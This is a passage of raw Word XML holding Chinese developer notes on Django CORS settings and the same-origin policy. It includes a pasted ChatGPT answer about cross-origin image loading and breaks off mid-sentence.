          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>跨域设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>设置允许的域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如果使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS_ALLOWED_ORIGINS = ["http://example.com", "http://127.0.0.1:8000",] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>限制已增强安全性，则需要注释</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS_ORIGIN_ALLOW_ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS_ORIGIN_ALLOW_ALL = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># CORS_ALLOWED_ORIGINS = ["http://localhost",]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>测试了下，这里如果写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost:80 ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>则浏览器访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>就会跨域报错，虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，但是这里写上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>就不对了，故推荐直接写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，或者默认端口的多谢写一个有端口的规则。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>允许携带认证信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS_ALLOW_CREDENTIALS = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1CC78" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29363F21" w14:textId="5F1E164E" w:rsidR="00C54015" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="654" w:name="_Toc159780084"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>同源策略和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="654"/>
    </w:p>
    <w:p w14:paraId="59C7F769" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFA0399" w14:textId="77777777" w:rsidR="00E51881" w:rsidRPr="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E47A088" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="655" w:name="_Toc159780085"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同源策略（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Same-Origin Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="655"/>
    </w:p>
    <w:p w14:paraId="1CE68B6D" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537F9E8D" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同源策略是浏览器的一项安全机制，它阻止网页从一个源（包括协议、域名和端口）加载的文档或脚本获取来自另一个源的数据。这是一种限制跨域请求的机制，其目的是防止恶意网站通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等手段窃取用户的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F26BC6" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1D81FE" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="656" w:name="_Toc159780086"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cross-Origin Resource Sharing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="656"/>
    </w:p>
    <w:p w14:paraId="0310B8CE" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338E6DE9" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种机制，它通过在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头部中添加一些特殊的标记，允许服务器声明哪些源被允许访问其资源。这是为了绕过同源策略的限制，使得在浏览器中发起跨域请求成为可能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B4A87" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04070772" w14:textId="77777777" w:rsidR="00E51881" w:rsidRPr="00875D8F" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>简而言之，同源策略是浏览器的安全机制，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00875D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00875D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则是一种通过在服务器和浏览器之间进行协议约定的方法，允许在跨域情况下进行资源共享。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB55132" w14:textId="77777777" w:rsidR="00E51881" w:rsidRPr="00875D8F" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5961BD42" w14:textId="72F8A827" w:rsidR="00C54015" w:rsidRPr="00875D8F" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00875D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00875D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的情况下，服务器可以发送附带</w:t>
      </w:r>
      <w:r w:rsidRPr="00875D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00875D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>头部的响应，告知浏览器哪些跨域请求是允许的。这样，浏览器就可以根据服务器的声明来决定是否允许前端页面访问跨域资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E119A1F" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397667DE" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74946248" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRPr="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我写一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>从我的另一个服务器下载图片，是不是这就不符合同源策略了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8B5931" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRPr="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE9A284" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0C6337" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是的，你描述的情况涉及到跨域资源访问，因此会受到同源策略的限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4716D7" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0543F220" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRPr="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同源策略阻止了网页从一个源（协议、域名和端口）加载的脚本去访问另一个源的资源。在你的情况下，如果你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>从另一个服务器下载图片，由于这涉及到不同的域，将触发同源策略的限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC7C0F" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66201B65" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了解决这个问题，你可以考虑以下几种方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7EA9F" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2880DC69" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRPr="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CORS (Cross-Origin Resource Sharing)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果你有控制权并能够修改图片服务器的配置，你可以在图片服务器上配置允许特定来源的请求。这涉及设置合适的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4570B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>头部，允许你的网站来访问资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72946B5A" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E75946" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理服务器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以设置一个在你的域内的代理服务器，该服务器在服务端获取图片然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>将其传递给前端。前端的</w:t>
      </w:r>
